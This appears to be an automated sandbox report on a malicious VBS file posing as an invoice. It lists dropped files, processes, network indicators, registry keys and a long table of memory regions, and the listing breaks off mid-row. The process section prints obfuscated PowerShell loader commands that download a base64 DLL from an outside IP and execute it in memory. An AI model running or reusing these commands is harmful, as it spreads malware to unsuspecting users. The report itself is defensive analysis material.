Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Ref. No INV088002904SINO.vbs
|
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3rm35jv.ftv.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjajxajs.yzb.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rv5m2ibe.fsd.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tigd1obk.kyu.ps1
|
very short file (no magic)
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe
= [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe
-Command $VXdfe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object
Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null,
[object[]] ('txt.fcc/222.37.522.581//:ptth'))
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://20.7.14.99
|
unknown
|
||
http://20.7.14.99/server/dll.txt
|
20.7.14.99
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
There are 1 hidden URLs, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
20.7.14.99
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
216B8820000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B0AABAC000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
30391CE000
|
stack
|
page read and write
|
||
216B867A000
|
heap
|
page read and write
|
||
15CFEE62000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
216B871C000
|
heap
|
page read and write
|
||
2169E5E0000
|
heap
|
page read and write
|
||
1B0AAD62000
|
heap
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
238CC053000
|
heap
|
page read and write
|
||
216A0530000
|
heap
|
page read and write
|
||
1B090A80000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B092870000
|
heap
|
page read and write
|
||
1B090C00000
|
heap
|
page readonly
|
||
F18603B000
|
stack
|
page read and write
|
||
7FF816346000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B0AAD19000
|
heap
|
page read and write
|
||
7FF8164F0000
|
trusted library allocation
|
page read and write
|
||
1B0AABAC000
|
trusted library allocation
|
page read and write
|
||
7FF816540000
|
trusted library allocation
|
page read and write
|
||
216B8617000
|
heap
|
page execute and read and write
|
||
F185D3E000
|
stack
|
page read and write
|
||
F185E38000
|
stack
|
page read and write
|
||
238CBB71000
|
heap
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816610000
|
trusted library allocation
|
page read and write
|
||
216B86D9000
|
heap
|
page read and write
|
||
F185D37000
|
stack
|
page read and write
|
||
1B0AB138000
|
heap
|
page read and write
|
||
7FF816470000
|
trusted library allocation
|
page read and write
|
||
1B0AB0D4000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816510000
|
trusted library allocation
|
page read and write
|
||
2169E680000
|
heap
|
page read and write
|
||
1B0AB0A9000
|
heap
|
page read and write
|
||
15CFED20000
|
heap
|
page read and write
|
||
1B0AABB0000
|
trusted library allocation
|
page read and write
|
||
1B090BE0000
|
heap
|
page read and write
|
||
7FF8162A3000
|
trusted library allocation
|
page read and write
|
||
216A0521000
|
trusted library allocation
|
page read and write
|
||
1B0AAD2C000
|
heap
|
page read and write
|
||
238CBB70000
|
heap
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
1B0AAB40000
|
heap
|
page execute and read and write
|
||
7FF81634C000
|
trusted library allocation
|
page execute and read and write
|
||
216A05FF000
|
trusted library allocation
|
page read and write
|
||
238CBB81000
|
heap
|
page read and write
|
||
1B0AAD6C000
|
heap
|
page read and write
|
||
7FF816290000
|
trusted library allocation
|
page read and write
|
||
303833E000
|
stack
|
page read and write
|
||
238CBC10000
|
heap
|
page read and write
|
||
1B0AAD3F000
|
heap
|
page read and write
|
||
30385FF000
|
stack
|
page read and write
|
||
216A07F2000
|
trusted library allocation
|
page read and write
|
||
1B0AB0E5000
|
heap
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
216B8823000
|
heap
|
page read and write
|
||
1B090B6E000
|
heap
|
page read and write
|
||
2169E70D000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B090B60000
|
heap
|
page read and write
|
||
7FF816550000
|
trusted library allocation
|
page read and write
|
||
7FF816527000
|
trusted library allocation
|
page read and write
|
||
7FF8165C0000
|
trusted library allocation
|
page read and write
|
||
1B0AB12E000
|
heap
|
page read and write
|
||
2169E6C0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB84000
|
trusted library allocation
|
page read and write
|
||
216B86E8000
|
heap
|
page read and write
|
||
216B870E000
|
heap
|
page read and write
|
||
7FF816450000
|
trusted library allocation
|
page execute and read and write
|
||
15CFEE29000
|
heap
|
page read and write
|
||
1B0AABB0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB97000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AABA3000
|
trusted library allocation
|
page read and write
|
||
2169E600000
|
heap
|
page read and write
|
||
1B0AAB89000
|
trusted library allocation
|
page read and write
|
||
1B092790000
|
trusted library allocation
|
page read and write
|
||
216B86C5000
|
heap
|
page read and write
|
||
216A089C000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816436000
|
trusted library allocation
|
page read and write
|
||
216A0B34000
|
trusted library allocation
|
page read and write
|
||
7FF8165D0000
|
trusted library allocation
|
page read and write
|
||
3037DFF000
|
stack
|
page read and write
|
||
303827E000
|
stack
|
page read and write
|
||
238CBB87000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B092A11000
|
trusted library allocation
|
page read and write
|
||
18F07B000
|
stack
|
page read and write
|
||
18EE7E000
|
stack
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B092857000
|
heap
|
page execute and read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
2169E6A0000
|
trusted library allocation
|
page read and write
|
||
F185DB9000
|
stack
|
page read and write
|
||
1B0AAD21000
|
heap
|
page read and write
|
||
1B092861000
|
trusted library allocation
|
page read and write
|
||
1B090AB9000
|
heap
|
page read and write
|
||
30384BA000
|
stack
|
page read and write
|
||
1B0AAD2E000
|
heap
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
2169E6D0000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B0AACF0000
|
heap
|
page read and write
|
||
7FF816442000
|
trusted library allocation
|
page read and write
|
||
1B0AAB84000
|
trusted library allocation
|
page read and write
|
||
216A0520000
|
trusted library allocation
|
page read and write
|
||
238CBBAB000
|
heap
|
page read and write
|
||
3038438000
|
stack
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
7FF8165B0000
|
trusted library allocation
|
page read and write
|
||
216A0520000
|
trusted library allocation
|
page read and write
|
||
15CFED90000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
216A0510000
|
trusted library allocation
|
page read and write
|
||
1B0AAB86000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB9A000
|
trusted library allocation
|
page read and write
|
||
1B09412F000
|
trusted library allocation
|
page read and write
|
||
1B0AAB60000
|
trusted library allocation
|
page read and write
|
||
2169E7B4000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
7FF816441000
|
trusted library allocation
|
page read and write
|
||
1B0AACC0000
|
trusted library allocation
|
page read and write
|
||
1B0AABB0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B090BC0000
|
trusted library allocation
|
page read and write
|
||
7FF8162CC000
|
trusted library allocation
|
page execute and read and write
|
||
F185FBE000
|
stack
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
D1598FC000
|
stack
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF81644D000
|
trusted library allocation
|
page read and write
|
||
F1859FE000
|
stack
|
page read and write
|
||
216B8830000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B094140000
|
trusted library allocation
|
page read and write
|
||
7FF816424000
|
trusted library allocation
|
page read and write
|
||
238CBC10000
|
heap
|
page read and write
|
||
7FF8165D0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
238CBC70000
|
heap
|
page read and write
|
||
216A0066000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB89000
|
trusted library allocation
|
page read and write
|
||
1B0AB093000
|
heap
|
page read and write
|
||
7FF8164C0000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
1B0AABA6000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
303807E000
|
stack
|
page read and write
|
||
2169E717000
|
heap
|
page read and write
|
||
1B0AAB96000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AB138000
|
heap
|
page read and write
|
||
1B0AAB84000
|
trusted library allocation
|
page read and write
|
||
2169E75A000
|
heap
|
page read and write
|
||
15CFEE8F000
|
heap
|
page read and write
|
||
1B090BA3000
|
heap
|
page read and write
|
||
238CA030000
|
heap
|
page read and write
|
||
238CBEC1000
|
heap
|
page read and write
|
||
216B8700000
|
heap
|
page read and write
|
||
1B090AF8000
|
heap
|
page read and write
|
||
1B0AAB60000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAD32000
|
heap
|
page read and write
|
||
216B85B0000
|
heap
|
page execute and read and write
|
||
1B0AB120000
|
heap
|
page read and write
|
||
7FF816500000
|
trusted library allocation
|
page read and write
|
||
1B0AAB9B000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
D1593FF000
|
stack
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
7FF816283000
|
trusted library allocation
|
page read and write
|
||
7FF8165E0000
|
trusted library allocation
|
page read and write
|
||
216B86C8000
|
heap
|
page read and write
|
||
1B0AAB9C000
|
trusted library allocation
|
page read and write
|
||
216B8820000
|
trusted library allocation
|
page read and write
|
||
216B0541000
|
trusted library allocation
|
page read and write
|
||
1B0AAB84000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
238CBB81000
|
heap
|
page read and write
|
||
7FF8165E0000
|
trusted library allocation
|
page read and write
|
||
7FF816520000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B093D0E000
|
trusted library allocation
|
page read and write
|
||
1B0AAB8A000
|
trusted library allocation
|
page read and write
|
||
7FF816490000
|
trusted library allocation
|
page execute and read and write
|
||
7FF816293000
|
trusted library allocation
|
page execute and read and write
|
||
1B0AB13E000
|
heap
|
page read and write
|
||
1B0AB0EA000
|
heap
|
page read and write
|
||
1B090C10000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
15CFEE3C000
|
heap
|
page read and write
|
||
1B0AABB0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB98000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
7FF816326000
|
trusted library allocation
|
page read and write
|
||
238CBDC0000
|
heap
|
page read and write
|
||
238CBDF0000
|
heap
|
page read and write
|
||
216B8830000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B0AAD2A000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
238C9E49000
|
heap
|
page read and write
|
||
F1858FE000
|
stack
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B093BF1000
|
trusted library allocation
|
page read and write
|
||
1B0AAB8E000
|
trusted library allocation
|
page read and write
|
||
1B0AAD17000
|
heap
|
page read and write
|
||
1B0AAB92000
|
trusted library allocation
|
page read and write
|
||
1B090B0C000
|
heap
|
page read and write
|
||
7FF816540000
|
trusted library allocation
|
page read and write
|
||
238CC0C0000
|
heap
|
page read and write
|
||
1B0AAD51000
|
heap
|
page read and write
|
||
1B0AAD56000
|
heap
|
page read and write
|
||
3037D7D000
|
stack
|
page read and write
|
||
30381FE000
|
stack
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AB05A000
|
heap
|
page read and write
|
||
1B0AB0F6000
|
heap
|
page read and write
|
||
7DF4ABB30000
|
trusted library allocation
|
page execute and read and write
|
||
1B0AAD45000
|
heap
|
page read and write
|
||
303817E000
|
stack
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
F185A7D000
|
stack
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
216A04F4000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AACD0000
|
trusted library allocation
|
page read and write
|
||
15CFEF00000
|
heap
|
page read and write
|
||
7FF816320000
|
trusted library allocation
|
page read and write
|
||
15CFEF02000
|
heap
|
page read and write
|
||
216B86DC000
|
heap
|
page read and write
|
||
1B0AB0CC000
|
heap
|
page read and write
|
||
303853F000
|
stack
|
page read and write
|
||
1B090AF2000
|
heap
|
page read and write
|
||
1B0AABB0000
|
trusted library allocation
|
page read and write
|
||
216B8820000
|
trusted library allocation
|
page read and write
|
||
2169E6B0000
|
heap
|
page readonly
|
||
1B093DB8000
|
trusted library allocation
|
page read and write
|
||
7FF816499000
|
trusted library allocation
|
page read and write
|
||
15CFEDC0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
D158EF9000
|
stack
|
page read and write
|
||
1B0AAB84000
|
trusted library allocation
|
page read and write
|
||
216A05F9000
|
trusted library allocation
|
page read and write
|
||
238CBB7D000
|
heap
|
page read and write
|
||
1B0AAB8E000
|
trusted library allocation
|
page read and write
|
||
7FF816376000
|
trusted library allocation
|
page execute and read and write
|
||
F185F3F000
|
stack
|
page read and write
|
||
238CA080000
|
heap
|
page read and write
|
||
1B0AABA2000
|
trusted library allocation
|
page read and write
|
||
216A07E8000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816280000
|
trusted library allocation
|
page read and write
|
||
216B8820000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
238CC0CE000
|
heap
|
page read and write
|
||
1B0AAB84000
|
trusted library allocation
|
page read and write
|
||
1B093ED2000
|
trusted library allocation
|
page read and write
|
||
D1595FE000
|
stack
|
page read and write
|
||
216B8840000
|
trusted library allocation
|
page read and write
|
||
1B0AABA5000
|
trusted library allocation
|
page read and write
|
||
1B0AAB9A000
|
trusted library allocation
|
page read and write
|
||
F18587E000
|
stack
|
page read and write
|
||
7FF816432000
|
trusted library allocation
|
page read and write
|
||
15CFEE00000
|
heap
|
page read and write
|
||
7FF8165A0000
|
trusted library allocation
|
page read and write
|
||
18F37F000
|
stack
|
page read and write
|
||
1B0908F0000
|
heap
|
page read and write
|
||
1B0AAB95000
|
trusted library allocation
|
page read and write
|
||
1B0AAB97000
|
trusted library allocation
|
page read and write
|
||
7FF816294000
|
trusted library allocation
|
page read and write
|
||
30382F8000
|
stack
|
page read and write
|
||
7FF816270000
|
trusted library allocation
|
page read and write
|
||
1B0AAD64000
|
heap
|
page read and write
|
||
216B86F1000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B092C24000
|
trusted library allocation
|
page read and write
|
||
1B0AB0A3000
|
heap
|
page read and write
|
||
1B0AB06E000
|
heap
|
page read and write
|
||
1B090C70000
|
heap
|
page read and write
|
||
7FF8165C0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B090AEC000
|
heap
|
page read and write
|
||
238C9CA0000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816590000
|
trusted library allocation
|
page read and write
|
||
7FF8164D0000
|
trusted library allocation
|
page read and write
|
||
7FF816600000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
216B86C1000
|
heap
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
7FF8165A0000
|
trusted library allocation
|
page execute and read and write
|
||
216B86B1000
|
heap
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB91000
|
trusted library allocation
|
page read and write
|
||
1B0AB125000
|
heap
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
2169E787000
|
heap
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
7FF816490000
|
trusted library allocation
|
page read and write
|
||
1B090BE5000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
7FF816290000
|
trusted library allocation
|
page read and write
|
||
1B093FDC000
|
trusted library allocation
|
page read and write
|
||
7FF8164C9000
|
trusted library allocation
|
page read and write
|
||
1B092864000
|
trusted library allocation
|
page read and write
|
||
F185B7E000
|
stack
|
page read and write
|
||
216A04F0000
|
trusted library allocation
|
page read and write
|
||
216A0520000
|
trusted library allocation
|
page read and write
|
||
1B0AAB96000
|
trusted library allocation
|
page read and write
|
||
30386BE000
|
stack
|
page read and write
|
||
1B0AAD3E000
|
heap
|
page read and write
|
||
1B0AACE0000
|
heap
|
page read and write
|
||
7FF816500000
|
trusted library allocation
|
page read and write
|
||
216B870B000
|
heap
|
page read and write
|
||
1B0AB13E000
|
heap
|
page read and write
|
||
7FF816580000
|
trusted library allocation
|
page read and write
|
||
F185AFE000
|
stack
|
page read and write
|
||
7FF8164B0000
|
trusted library allocation
|
page read and write
|
||
7FF816530000
|
trusted library allocation
|
page read and write
|
||
1B093624000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AB093000
|
heap
|
page read and write
|
||
216B8714000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
303914E000
|
stack
|
page read and write
|
||
238C9E00000
|
heap
|
page read and write
|
||
7FF816560000
|
trusted library allocation
|
page read and write
|
||
7FF81627D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8164A0000
|
trusted library allocation
|
page read and write
|
||
1B0AB0CC000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
1B0AB0FC000
|
heap
|
page read and write
|
||
1B0A2A6F000
|
trusted library allocation
|
page read and write
|
||
1B0AAB83000
|
trusted library allocation
|
page read and write
|
||
15CFEE69000
|
heap
|
page read and write
|
||
1B0AAB82000
|
trusted library allocation
|
page read and write
|
||
15CFEE66000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB70000
|
trusted library allocation
|
page read and write
|
||
1B0AB0F0000
|
heap
|
page read and write
|
||
216B86D5000
|
heap
|
page read and write
|
||
1B0AAD09000
|
heap
|
page read and write
|
||
1B0AAB82000
|
trusted library allocation
|
page read and write
|
||
1B0AAB89000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
216B8707000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
15CFEE77000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
7FF816580000
|
trusted library allocation
|
page read and write
|
||
15CFEE5F000
|
heap
|
page read and write
|
||
1B0AB0FD000
|
heap
|
page read and write
|
||
1B092850000
|
heap
|
page execute and read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
1B092840000
|
trusted library allocation
|
page read and write
|
||
238CA085000
|
heap
|
page read and write
|
||
1B0AABB0000
|
trusted library allocation
|
page read and write
|
||
18EB4B000
|
stack
|
page read and write
|
||
1B0AB104000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
216A0060000
|
heap
|
page read and write
|
||
1B0AAB93000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
18F27F000
|
stack
|
page read and write
|
||
216A0520000
|
trusted library allocation
|
page read and write
|
||
216B86FC000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AABB0000
|
trusted library allocation
|
page read and write
|
||
7FF816480000
|
trusted library allocation
|
page read and write
|
||
1B0AB0DB000
|
heap
|
page read and write
|
||
1B0AAB9C000
|
trusted library allocation
|
page read and write
|
||
1B0AABC0000
|
heap
|
page read and write
|
||
1B090B39000
|
heap
|
page read and write
|
||
7FF816412000
|
trusted library allocation
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B090A50000
|
heap
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
D1590FE000
|
stack
|
page read and write
|
||
1B0AB13E000
|
heap
|
page read and write
|
||
1B0AABA4000
|
trusted library allocation
|
page read and write
|
||
15CFF802000
|
trusted library allocation
|
page read and write
|
||
1B090C75000
|
heap
|
page read and write
|
||
1B0AABAD000
|
trusted library allocation
|
page read and write
|
||
1B092860000
|
trusted library allocation
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
238CBB72000
|
heap
|
page read and write
|
||
7FF816480000
|
trusted library allocation
|
page read and write
|
||
1B094147000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
7FF8162A0000
|
trusted library allocation
|
page read and write
|
||
2169E755000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
238CBB97000
|
heap
|
page read and write
|
||
1B0AAB90000
|
trusted library allocation
|
page read and write
|
||
216A0520000
|
trusted library allocation
|
page read and write
|
||
216B86B6000
|
heap
|
page read and write
|
||
216B867F000
|
heap
|
page read and write
|
||
D1596FE000
|
stack
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
15CFED30000
|
heap
|
page read and write
|
||
1B09288D000
|
heap
|
page read and write
|
||
1B0AAD68000
|
heap
|
page read and write
|
||
15CFEE63000
|
heap
|
page read and write
|
||
7FF8164A0000
|
trusted library allocation
|
page read and write
|
||
7FF816340000
|
trusted library allocation
|
page read and write
|
||
216A0520000
|
trusted library allocation
|
page read and write
|
||
1B0A2A20000
|
trusted library allocation
|
page read and write
|
||
1B0AABA0000
|
trusted library allocation
|
page read and write
|
||
303924D000
|
stack
|
page read and write
|
||
7FF81629D000
|
trusted library allocation
|
page execute and read and write
|
||
3037CF5000
|
stack
|
page read and write
|
||
1B0AAB80000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
7FF8164D0000
|
trusted library allocation
|
page read and write
|
||
1B0AAB81000
|
trusted library allocation
|
page read and write
|
||
7FF816292000
